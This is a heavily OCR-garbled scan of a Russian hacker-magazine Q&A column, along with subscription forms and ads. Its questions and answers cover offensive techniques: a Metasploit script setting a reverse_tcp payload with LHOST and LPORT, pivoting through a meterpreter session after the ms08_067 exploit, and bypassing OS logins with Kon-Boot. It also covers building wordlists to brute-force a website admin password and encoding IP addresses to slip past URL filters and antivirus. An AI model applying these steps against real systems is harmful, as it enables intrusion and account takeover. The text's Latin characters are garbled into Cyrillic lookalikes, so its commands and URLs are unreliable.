тз 1сопзо1е_гс_гиЬу_ехатр1е . гс ) > 
зеС РАУЬОАБ міпсІомз/теЦегргеЦег/ 
геѵегзе_Ьср 

гезоигсе (сІоситепСаСіоп/ 
тз :Есопзо1е_гс_гиЬу_ехатр1е . гс ) > 
зеС ЬРОКТ 4444 
гезоигсе (сІоситепРаЦіоп/ 
тз 1сопзо1е_гс_гиЬу_ехатр1е . гс ) > 
зеС ЬНОЗТ 192.168.0.228 
гезоигсе (сіосишепСаЦіоп/ 
тз 1сопзо1е_гс_гиЬу_ехатр1е . гс ) > 
зеС ЕхіРОпЗеззіоп Іаізе 
гезоигсе (сІоситепРаЦіоп/ 
тз 1сопзо1е_гс_гиЬу_ехатр1е . гс ) > 
ехріоіс — з 

Кстати, разработчик М еіазріоіі НЭ Мооге 
пообещал в скором времени показать миру 
Меіазріоіі Ехргезз — графическую оболочку 



для управления метасплойтом. Жальтолько, 
что продукт будет платным. 

0: С помощью Меіазріоіі получил доступ к 
удаленной машине. Подскажи, можно ли как- 
то затуннелироватьтрафикчерез Меіазріоіі: 
сессию? 

А: Да, в Меіазріоіі есть такая возможность. 
Представим, что мы получили доступ с 
машины 10.1.1.1 на 10.1.1.128. Выглядитэто 
примернотак: 

[*] МеСегргеСег зеззіоп 1 орепесі 
(10.1.1.1:4444 -> 10.1.1.128:1238) 

шеСегргеСег > гип деЦ_1оса1_зиЬпеСз 
Ьосаі зиЬпеС : 

10.1.1 .0/255.255.255 . 0 
шеСегргеСег > Ьаскдгоигкі 
тзі ехріоіс (шз08_067_пеСарі ) > 
гоиСе а (Ісі 10.1.1.0 255.255.255.0 1 
тзі ехріоіс (шз08_067_пеСарі ) > 
гоиСе ргіпС 

АсСіѵе РоиСіпд ТаЫе 
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10.1.1.0 255.255.255.0 Зеззіоп 1 

Теперь весь трафик, посылаемый в 1 0.1 .1 .0 
подсеть, будеттуннелироваться через 
МеІазрІоК-сессию. Есть еще более простой 
способ — использовать плагин аиІо_асІсІ_ 
гоиіе: 



тзк ехріоік (тз08_067_пекарі ) > Іоасі 
аик о_а55_г оик е 



[*] Зиссеззкиііу 1оа5е5 ріидіп : 
аи С о_а сіс1_г ои С е 

тзк ехріоік (тз08_067_пекарі) > 
ехріоік 

Фишка в том, что при удачном срабатывании 
сплойта автоматически добавляется соот- 
ветствующее параметрам сессии правило 
роутинга. 

0: Как можно отслеживать все изменения в 
сети: появление новыхустройств, изменения в 
конфигурации хостов (появление новых откры- 
тых/закрытых портов)? 

А: В этом может помочь всем известный 
КІтар. Если ты обращал внимание, среди 
списка его опций есть такая: 



ОІІТРІІТ : 

-оЫ/-оХ/-оЗ/-оС <кі1е> : Оикрик 
зсап іп погшаі , ХМЬ, з I <Прк 
к1с3.с3.і3 # апсі СгераЫе когтак , 
гезрескіѵеіу , ко кЪ.е діѵеп 
кііепаше . 



Опция -оХ <имя_файла> (оиІриіХМи опреде- 
ляет, в какой ХМЕ-файл сохранять результаты 
сканирования. Просканировав сеть два 
раза и сохранив результаты в ХМБ-файлах, 
можно просмотреть изменения при помощи 
утилиты І\Юііі, входящей в ІМтар. Посмотрим, 
к примеру, что изменилось после повторного 
сканирования одного из хостов сети: 



$ пйікк -ѵ зсапше-і.хші зсапше-2 . 
хті 

-Ыок вЪоші: 95 кіікегей рогкз 
+Ыок зкюші: 993 кіікегесі рогкз 
РОЕТ ЗТАТЕ ЗЕКѴІСЕ ѴЕКЗІОЫ 

22/кср ореп ззЪ. 

25/кср сіозей згпкр 
53/кср ореп йотаіп 

+70/кср ореп доркег 
80/кср ореп кккр 

113/кср сіозей аикк 
+ 31337/кср ореп Еііке 



Соответственно, плюсом отмечено то, что 
добавилось, а минусом — то, что ушло. Таким 
образом, видно, что появились новые откры- 
тые порты 70 и 31337. Все то же самое можно 
проделать и с помощью ѲІІІ-фронтенда для 
ІЧтар — Еептар. 

0: Как можно обойти защиту паролем на вход в 
операционную систему? 

А: Такая задача встречается довольно часто. 
Существуют специальные утилиты, позволяю- 
щие сбросить пароль или просто войти в сис- 
темуслюбым пассом. Можно воспользоваться 
утилитой Коп-Вооі [ ѵумѵу.ріоігЬапіа.сот/аЦ/ 
коп-Ьооі: ). Схема работы проста: с официаль- 
ного сайта загружаем образ для ЕІорру/СО/ 
115В и создаем загрузочный диск/дискету/ 
флешку. Загружаемся с нее и в появившем- 
ся меню выбираем первую опцию — « 1 5к 
Коп-Вооі». Ждем, при повторном появлении 
меню выбираем опцию «2пб Ігу Ьоок (тот 
бгіѵе С: аз ЬсІІ ». Если не удалось загрузить 
ЬсІІ — выбираем 662 ит.д. Если необходимо 
войти вЕіпих — логинимся как пользователь 
коп-изг, а для входа в ѴѴіпбоѵѵз сойдет любое 
действительное имя пользователя слюбым 
паролем (можно пустым). На данный момент 
с помощью этой программки можно зайти как 
в ѴѴіпбоѵѵз (поддерживает все версии вплоть 
до семерки), так и в Еіпих (к сожалению, пока 
еще не все дистрибутивы). 

0: Подбираю пароль кадминке сайта. Исполь- 
зовал уже все возможные словари, и пока 
никак. Похоже, словарик придется составлять 
самому — как это автоматизировать? 

А: Иногда бывает полезно составить словарь 
для конкретного сайта, так как зачастую поль- 
зователи используют в пароле сочетания, 
связанные с его тематикой или даже названи- 
ем. В первую очередь надо пропарсить кон- 
тент сайта и собрать слова. В этом деле очень 
пригодится утилита СеѴѴЕ (Сизіот ѴѴогб Еіз( 
депегаіог — мѵѵм.бідіпіща.огс ). Написанный 
на Рыбу паук обходит весь сайт до заданной 
глубины (по умолчанию равной 2) и составля- 
ет список часто используемых слов. Следует 
обратить внимание на следующие опции: 

• берЕа — глубина сканирования; 

• тіп_ѵѵог6_ІепдіЬ — минимальная длина 
слова; 

• ѵѵгКе — имя файла для сохранения резуль- 
татов. 

После этого полученный список слов надо 
скормить боб п ТЬе Ріррег, чтобы он немного 
разнообразил их, добавив цифры и изменив 
в некоторых местах регистр (все это пропи- 
сывается в правилах). Легко и эффективно 
составить правила поможет другая утилита 
— Л В СопЕд Макет ( зііез.доодіе.сот/зііе/ 
геизаЫезес2/фгсоп1 : іддепегаІог ). 



О: Как посмотреть в І_іпих список недавно 
модифицированных файлов? 

А:Длятого, чтобы посмотреть список файлов, 
которые недавно изменились, достаточно 
запомнить несколько полезных ключей для 
команды Із. Так, «Із -Иг» выдаст информа- 
цию об измененных файлах в текущей папке. 
Чтобы увидеть недавно модифицированные 
файлы всей файловой систем, можно исполь- 
зовать команду: Епб /е(с -Іуре \ -ргіпЛ "%ТЙ 
%Т+ %р" I зогі -п. 

О: Как из-под Ыпих удаленно выключить вин- 
довую машину? 

А: Удаленная ѴѴіпбоѵѵз-машина можетбыть 
легко выключена, если у тебя стоит 5а тба, 
и есть аккаунт с достаточными правами на 
машине с ѴѴіпбоѵѵз. Делается это с помощью 
механизма удаленного вызова процедур: пек 
грс зЕііЫоѵѵп -5 (ЕеЕозіпате -II (беизегпате, 
где ЕіеЕозІпате — имя удаленного узла или 
его ІР-адрес. Крометого можно передать 
дополнительные параметры, используе- 
мые утилитой збиібоѵѵп в ѴѴіпбоѵѵз: пеі грс 
збиЫоѵѵп -5 іЬеЬозіпате -ШЬеизегпате -М 
60 (установить таймаут в 60 секунд и прину- 
дительно закрыть все приложения перед 
выключением). 

О: Можно ли как-то обмануть ІІВІ_-фильтры? 

А: Современные браузеры могут восприни- 
мать 14 Р б нетолько в десятичной системе, но 
также в8-ричной и 16-ричной, и даже единым 
32-битным числом. Таким образом ІІРЕтипа 
66.102.13.19 можно представить следующими 
способами: 

Ьккр: //0x42 . Охб б . 0x05. ОхбЗ 
Ьккр: / /0х42бб0й63 
Ьккр: //1113984355 

Ьккр: //00000102. 00000146. 00000015. 00000143 

Если кликнуть по любому из вариантов, 
попадешь на доодіе.сот. На самом деле эта 
техника не нова и известна уже давно. Но, как 
показывает практика, некоторые производи- 
тели антивирусного ПО про нее подзабыли, и 
их продукты, блокирующие ссылку в нормаль- 
ном виде, пропускают8-, 16- или 32-ричный 
ІР-адрес. Преобразовать ІР из одного фор- 
мата в другой поможет онлайн-сервис уууууА 
сздпеІѵуогк.сот/іраббсопѵ.ЫтІ . 

О: Как реализовать обмен трафиком между 
машинами, находящимися за разными МАТ- 
серверами? 

А: Когда один из двух компьютеров находит- 
ся за І\ІАТ, реализовать свободный обмен 
трафиком между ними уже затруднительно. 
Когда за ІЧАТ’ом оказываются сразу два учас- 
тника обмена, то задача усложняется вообще 
в разы. Ксчастью, выходесть. Благодаря 
программе Рѵѵпаілюбое количество клиентов, 
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находящихся за одним ЫАТ-сервером, может 
соединяться с хостом, стоящим за другим ЫАТ, 
при этом нетребуется проброска портов на 
серверах и использование прочих инстру- 
ментов. Все это без каких-либо посредников, 
спуфинга, трюков с О N5 и технологий ІІРпР/ 
ЭТІІІЧ/ІСЕ — исключительно ноу-хау разра- 
ботчиков. 

Общий синтаксис для запуска имеет несколь- 
ко ключей: ./ рѵѵпаі; <-з I -о <агдз>, где -в, -с 
соответственно означают «клиент» и «сер- 
вер». Для «клиента» надо указать следующие 
аргументы: 

<агдз>: [Іосаі ір] <1оса1 
рогР> <ргоху 1юзк> [ргоху рогР 

(сіе! : 2222 ) ] <гетоРе Ъ.озк> сгетоРе 
рогР> 

Для сервера, помимо прочего, можноуказать 
доверенные хосты и порты: 

<агдз>: [Іосаі ір] [ргоху 
рогР (сіеі : 2222 ) ] [ [аііоотесі 
Тюзк] : [аііоѵѵесі рогР] . . . ] 

0: Как разобраться, почему только что установ- 
ленная семерка свалилась в В50Б? 

А: Чтобы не ковыряться в странных аббреви- 
атурах и дампах, которые создает винда при 
падении, лучше поставить небольшую, но зато 
очень полезную утилиту ѴѴЬоСгазЬесІ [ ѵѵѵѵѵѵ. 
гезрІепбепсе.сот/ѵѵЬосгазЬесІ ). Вот она-то и 
расскажет, кто свалил систему. Али драйвер 
какой, али программа, али еще что-нибудь. 
Так или иначе, будетуказано название конк- 
ретного модуля, его расположение на диске, 
название ошибки, описание программы с ука- 
занием разработчиков (берегитесь!). Послед- 
няя версия как раз поддерживает«семерку», 
причем как 32- , так и 64-битную версии. 

0: Будущая версия Ѵізиаі Біисііо будет поддер- 
живать странный язык С++Ох. Как вы к нему 
относитесь? 

А: Ну, это не совсем язык программирования, 
а скорее новый, переработанный стандарт 
привычного С++. Поскольку уже опубликован 
финальный черновик (сігаіі-версия), можно 
суверенностью сказать: проект попрет. К 
тому же, в новой Ѵ5201 0 действительно уже 
реализованы многие из заявленных нововве- 
дений С++. В блоге разработчиков даже есть 
сводная таблица, в которой перечислены те 
аспекты С++Ох, которые уже поддерживает 
новая «студия». Благодаря новому стандар- 
ту мы получим многие механизмы, которые 
уже давно используются в других языках. 
Например, лямбда-выражения, позволяющие 
упросить некоторые фрагменты кода, а также 




РѵаШе-ссылки, позволяющие различить вре- 
менные и постоянные объекты, увеличивтем 
самым производительность приложения. 

0: Пользователям мобильных платформ я 
отдаю специально переработанную веб-стра- 
ницу, в которой используется упрощенная 
верстка. Раньше определить такую категорию 
пользователей было легко, но теперь, с появле- 
нием все новых и новых мобильных браузеров, 
это становится все сложнее и сложнее. Есть ли 
готовое решение, чтобы не тратить время на 
проверки вручную, заново изобретая велоси- 
пед? 

А: Проблема на самом деле нетолько втом, 
чтобы определить факт использования мо- 
бильного устройства; сложнее понять, с каким 
девайсом имеешь дело, и на что он способен 
(разрешение, используемый браузер ит.д.]. 
Свои наработки в этой области сделали 
доступными ребята из Яндекса, предоста- 
вив всем доступ к их Яндекс. Детектору ( арі. 
ѵа пбехти/сі еіесіог/сіос/сі д/со псе рІз/АЬоиЕ 
хті ). Работает это следующим образом. На 
« Ьир://рМ.ѵапсІех.пе[/сІе[ес[/ » отправляет- 
ся специальный запрос, в ответ на который 
приходитХМБ-выдача с результатами опре- 
деления модели и характеристикустройства. 
Дальше все зависит от тебя (можно сделать 
отдельные страницы для іРЬопе, АпбгоісІ или, 
скажем, Орега Міпі). В своей работе сервис 
использует содержимое заголовков НТТР-за- 
просов, передаваемых браузером мобильного 
устройства: ргобіе, ѵѵар-ргобіе, х-ѵѵар-ргобіе, 
изег-адепі:, х-орегатіпі-рбопе-иа. Примеры 
использования на РНР/РеК доступны на 
официальном сайте. 

0: В бтаіі'е наконец-то появилась возмож- 
ность Огад'п'Огор'ом приаттачивать к письму 
файлы. Какони сделали это в веб-приложе- 
нии? Нигде подобного больше не видел. 

А: Это стало возможным за счеттакой 
офигенной штуки НТМБ5 как РіІеАРІ ( 
ѵѵЗ.ога/ТР/2009/ѴѴР- РіІеАРІ -20091 1 1 7 ). Это 
расширение возожностей ЧЭ в сторону работы 
с файлами. Теперь можно получать нетолько 
имена файлов, но и их МІМЕ-тип, размер, а са- 
мое главное — содержимое! Увы, как и любые 
технологии НТМБ5, они реализованы лишь в 
некоторых браузерах: поддерживают ЕіІеАРІ 
лишь последние версии Еігеіюх и СЬготе. 
Полный код я приводить не буду, все нюансы и 
исходники доступны в замечательных статьях: 
]аѵа5СгірЕги/Ь[од/Вгта[еѵ.ее/Еі[еАРІ.ѵѵѵѵѵѵ. 
кі д огѵѵ. сот/а гбсІез/бсИіІе . 

0: Один из хакерских плагинов для РігеГох 
обновляется очень редко, а новые версии бра- 
узера отказываются его подключать, ссылаясь 



на отсутствие совместимости. Как бы вырубить 
эту проверку? 

А: Для этого есть свойство в аЬоиСсопбд 
(специальная страница стонкими на- 
стройками браузера). Ищи "ехіепзіопз. 
сбескСотраЕЬкКу" и выставляй значение 
"[аізе". Если такого ключа нет, то параметр 
нужно создать самому. 

0: Задача: периодически делать бэкап не- 
скольких тысяч файлов с никсового сервера. 
Когда попробовал скачать все по РТР, стало 
ясно, что я скорее состарюсь — процесс идет 
очень медленно. Догадался предварительно 
подключаться по 55Н и упаковывать файлы в 
один архив, но как бы это автоматизировать? 

А: Если сервер поддерживает подключения 
по 5ЕТР, то самый простой путь — написать 
несложный скрипт для ѴѴіпЭСР (ѵѵі пзср. пеі) . 
Задача простая: упаковываем файлы на 
удаленном сервере, скачиваем архив ксебе, 
удаляем его с сервера. Чтобы клиент каждый 
раз не просил данные для аутентификации, 
необходимо сохранить сессию со всеми необ- 
ходимыми параметрами (назовем соединение 
АссоипіЫате). После подключения не забудь 
нажать СМ+Т — должно появиться окно кон- 
соли. Если этого не происходит, значит, утебя 
нет доступа к шеллу, и ничего не выйдет. Если 
же все О К, можно писать наш скрипт. 

орСіоп ЪаксЪ. оп 
орСіоп сопіігт оіі 
ореп АссоипСЫате 
ссі /Тюте/зкер/ 

саіі Саг — с 2 --ехс1ис!е=*сас1іе* -1 / 

коте/зкер/Стр/РТР-Ьаскир-$ (сіаке 

+ %У-%т-%с1) . Цд 2 . /риЫіс_1Шт1/ 

ссі /Тюте/гагзк/ктр/ 

дек -сіеіеке РТР-Ъаскир* "с:\Му 

БгорЬох\Васкир\ " 

ехік 

Первые две строчки позволят скриптам 
выполняться автоматически без под- 
тверждений пользователя. Команда ореп 
устанавливает соединение, которое ты 
предварительно создал (необходимо указать 
правильное имя). Далее выполняем ряд 
обычных никсовых команд по созданию 
архива с бэкапом и с помощью команды Оеі 
указываем, что файл надо скачать в локаль- 
ную папку (в моем случае — БгорЬох). Теперь 
необходимо добавить запуск ѴѴіпЭСР и на- 
шего скрипта в планировщике (стандартный 
виндовый или, скажем, ппСгоп), чтобы тот с 
нужной периодичностью запускал ѴѴіпЭСР. 
ехе /сопзоіе /зсгіріУ баски рТхГ. Весь код 
скрипта, какты, вероятно, догадался, сохра- 
нится в файл ЬаскирТхІ. НЕ 
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подпишись 

зНор.діс.ш 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



іВ 

2 

ш 

< 

о 



СТРАНА 



ИГР 





выходит 2 раза в месяц 

1 2 номеров 2400 руб. 
24 номера 4400 руб. 



б номеров 1 300 руб. 
1 2 номеров 2300 руб. 



ТѢ ОІЮХРЕРТ ОѴО 




ОраІРНоЮ мастерская 



ХУ/ІИГЛН 



СВОІЕИЗНЕС 



й 

о 

е 



б номеров 1 056 руб. 
12 номеров 1920 руб. 



6 номеров 747 руб. 
12 номеров 1350 руб. 




б номеров 890 руб. 3 номера 630 руб. 
12 номеров 1630 руб. б номеров 1140 руб. 




б номеров 890 руб. 

1 2 номеров 1 630 руб. 








ЖЕЛЕЗО ППС 



1 КМНМГ 

автомобилей 



торспш 





6 номеров 1200 руб. 
1 2 номеров 21 00 руб. 




б номеров 1 200 руб. 
1 2 номеров 21 00 руб. 




6 номеров 990 руб. 
12 номеров 1790 руб. 



ё 

Ш 

< 



6 номеров 726 руб. 6 номеров 600 руб. 
12 номеров 1320 руб. 12 номеров 1080 руб. 





зіфазз 



Моипіаіп 



ТаІаІйюНиІ 



Вышигюю 

“КрССТИКОМ 



Вышиваю - 
-ирсаиком 





только на сайте 

2 номера 284 руб. 




только на сайте 

4 номера 556 руб. 

8 номеров 1008 руб. 



6 номеров 774 руб. 
12 номеров 1404 руб. 




б номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 450 руб. 
1 3 номеров 975 руб. 







(дате)іамі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 















РШСО-ШЕЛЛКОД ПОД ѴШ00ѴѴ5 Х64 
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ВЫГОДА*ГАРАНТИЯ*СЕРВИС это ЛЕГКО! 





БУДЬ УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! 
СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 

Замучилися искать журнал в палатках и мага- 
зинах? Не хочешь тратить на это время? Не 
надо. Мы сами потратим время 
и привезем тебе новый выпуск X. 

Для жителей Москвы (в пределах МКАД) 
доставка может осуществляться 
бесплатно с курьером из рук в руки 
в течение трех рабочих дней с момента 
выхода номера на адрес офиса или 
на домашний адрес. 



Еще один удобный способ оплаты 
подписки на твое любимое издание — в любом 
рІШ из 72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 



ЕСТЬ ВОПРОСЫ? Звони по бесплатным телефонам 
8(495)780-88-29 (для москвичей) и 8(800)200-3-999 
(для жителей других регионов России, абонентов 
сетей МТС, БиЛайн и Мегафон). 

ВОПРОСЫ, ЗАМЕЧАНИЯ И ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ 
ПРОСИМ ПРИСЫЛАТЬ НА АДРЕС іпГоІсРфс.ги 




1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта 

вЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• по электронной почте $иЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва. 

ул. Тимура Фрунзе, д. 11, стр. 44. 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется 
в день обработки купона и квитанции 
с номера, выходящего через один 
календарный месяц после оплаты. 

Например, если произвести оплату в январе, 
то подписку можно оформить с марта. 



СТОИМОСТЬ ЗАКАЗА: 

2100 РУБ. ЗА 12 МЕСЯЦЕВ 
1200 РУБ. ЗА 4 МЕСЯЦЕВ 

■ Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 



по Москве в пределах МКАД 



Л- 



ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


□ на 6 месяцев 
| | на 12 месяцев 
начиная с 


20 г. 


^ прошу выслать бесплатный 
номер журнала 



I — I Доставлять журнал по почте 
' — ' на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 





21 


Ч 


1 




Л 


9 


1 


1 

1 Г л 


ІІЫІТ5 






НТТР://ѴѴѴѴѴѴ2 




ІМО 

ѵѵѵѵѵѵ.іто.іт 



Когда мне нужно было срочно выйти в аську с чужого компьютера, 
я всегда использовал единственный достойный онлайн-сервис - 

тееЬо.сот.Теперьже, наконец, появиласьхорошая альтернатива в 
лице іто.іт. По правде говоря, на глаза он попался совершенно слу- 
чайно, когда я искал онлайн-за мену для Зкуре, позволяющую не только 
использовать внутренний чат, но и совершать голосовыезвонки. Теперь 
же активно юзаю іто.іт и для аськи, и для Зкуре, и для ОТаІк! А ради 
интереса установил и декстопную версию іто.іт на свой ноутбук. 




ѲАВОРА 

ѵѵѵѵѵѵ.дагора.сот 

Найти нужную картинку в большем разрешении — зачастую не такая 

уж большая проблема. Если скормить изображение сервису ТіпЕуе 
(б пеуе. сот], тот достаточно быстро выдаст картинки из других источни- 
ков, втом числе большего размера. У меня на этот случай даже установ- 
лен плагин для боодіе СЬготе. Но если нужно найти не точно такую же 
картинку, а что-нибудь похожее, то это уже задачка для нового сервиса 
ОагоРа. Забавно, что в качестве условий для поиска может выступать как 
файл с изображением, таки скетч, нарисованный от руки в специальном 
ЕІазЬ-редакторе. 




Генерация .Ыассезз 
конфига 



.НТАССЕ55 КЕйІКЕСТ 

Ьіассеззгесіігесі.пеі: 




Создаем сменный 
скин сайта 



КАМЕІ.ЕООЫ 

ѵѵѵѵѵѵ. ка гтп е Іе о о п . с о т 



Матерым системным администраторам едва ли понадобится генера- 
тор .Ыассезз файлов, но для тех, кому поднимать веб-сервер прихо- 
дится лишь время от времени, этот сервис незаменим. Задать особые 
страницы для 404/500 ошибок, установить пароль для просмотра папки, 
заблокировать пользователей по ІР, настроить редирект— все это и 
многое другое осуществляется через .Ыассезз файл. Когда ковыряться 
в нем руками времени нет, а изучать синтаксис неохота, сгенерировать 
конфигпоможетсервис .Ыассезз гебігесЕ Аналогичные инструменты 
встречаются также в админках хостинг-панелей. 



Забавный по своей затее сервис представили французские програм- 
мисты. Суть проста: с помощью браузера и удобного онлайн-сервиса ты 
можешь создать свой скин для любого сайта. Изменить оформление веб- 
страницы можно за несколько минут, при этом понадобится только брау- 
зер. Выглядит это так: ты указываешьадрес сайта в нужной графе, после 
чего тот открывается внутри специального АбАХ- редактора. Далее можно 
выбрать произвольный элемент дизайна и изменять его как вздумается 
с помощью всплывающих управляющих панелей. Особенно здорово 
Катеіеооп работаете известными движками, например, ѴѴогсІргезз’ом. 
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Наш РС никогда не висит! 




МАХІМ 

МУЖСКОЙ ЖУРНАЛ С ИМЕНЕМ 




Альфа-Банк 



(дате)іаіиі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 




ЛАЗЕРНЫЙ ДАТЧИК АѴАОО 

(ЧАСТОТА ОБРАБОТКИ 13000 КАДРОВ В СЕКУНДУ] 



РЕГУЛИРОВАНИЕ ВЕСА МАНИПУЛЯТОРА 
С ПОМОЩЬЮ НАБОРА ГРУЗОВ 



ПЕРЕКЛЮЧАЕМОЕ РАЗРЕШЕНИЕ 
ЕО/ЗВО/В 1 □ / 1 0ОО/ЗВОО/5О4О ЮРІ 



ЭРГОНОМИЧНАЯ ФОРМА ДЛЯ УДОБНОЙ РАБОТЫ. 



* СЪЕМНЫЕ БОКОВЫЕ НАКЛАДКИ 
РАЗЛИЧНОГО ПРОФИЛЯ 



4-Х ПОЗИЦИОННОЕ КОЛЕСО ПРОКРУТКИ 

В ВЕРТИКАЛЬНОМ И ГОРИЗОНТАЛЬНОМ НАПРАВЛЕНИЯХ. 



КЕРАМИЧЕСКИЕ НОЖКИ ДЛЯ ЛЕГКОГО 
СКОЛЬЖЕНИЯ. 



9 ПРОГРАММИРУЕМЫХ КНОПОК 



"7 ПЕРЕКЛЮЧАЕМЫХ ИГРОВЫХ РЕЖИМОВ 
ДЛЯ ЗАПУСКА СЦЕНАРИЕВ-СКРИПТОВ, 
СОЗДАННЫХ ПОЛЬЗОВАТЕЛЕМ. 



ИГРОВАЯ УТИЛИТА В КОМПЛЕКТЕ 
ДЛЯ ЗАПИСИ МАКРОСОВ 



ПОДКЛЮЧЕНИЕ ЧЕРЕЗ ОЗВ-ПОРТ. 



РЕКЛАМА 




